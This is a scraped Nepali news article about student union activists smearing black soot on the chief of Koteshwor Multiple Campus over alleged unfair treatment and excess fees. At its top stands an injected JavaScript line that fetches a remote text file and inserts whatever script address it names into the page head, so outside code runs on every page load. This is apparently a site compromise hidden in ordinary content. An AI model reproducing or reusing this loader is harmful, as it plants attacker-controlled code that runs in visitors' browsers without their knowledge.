;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं। नेपाल विद्यार्थी संघ कोटेश्वर बहुमुखी क्याम्पस इकाईले क्यम्पस प्रमुख गोविन्द बहादुर कार्कीलाई कालो मोसो लगाएको छ । क्यम्पसले विद्यार्थीहरुलाई निरन्तर अनन्यय गरेको, क्याम्पसको बेथितीहरुमा आवाज उठाउँदा पनि कुनै वास्ता नगरेको साथै विद्यार्थीहरुबाट बढी शुल्क असुल गरे सँगै शिक्षामा समेत राजनीति गरेको भन्दै संघले आज कालोमोसो लगाएको हो ।
शिक्षा सुधारका क्षेत्रमा र विद्यार्थीको हितको निमित्त पटक पटक ध्यानाकर्षण गराउँदा समेत बेवास्ता गरेको कारण कालोमोसो दल्न बाध्य भएको जानकारी आएको छ ।
फेसबुक प्रतिक्रियाहरु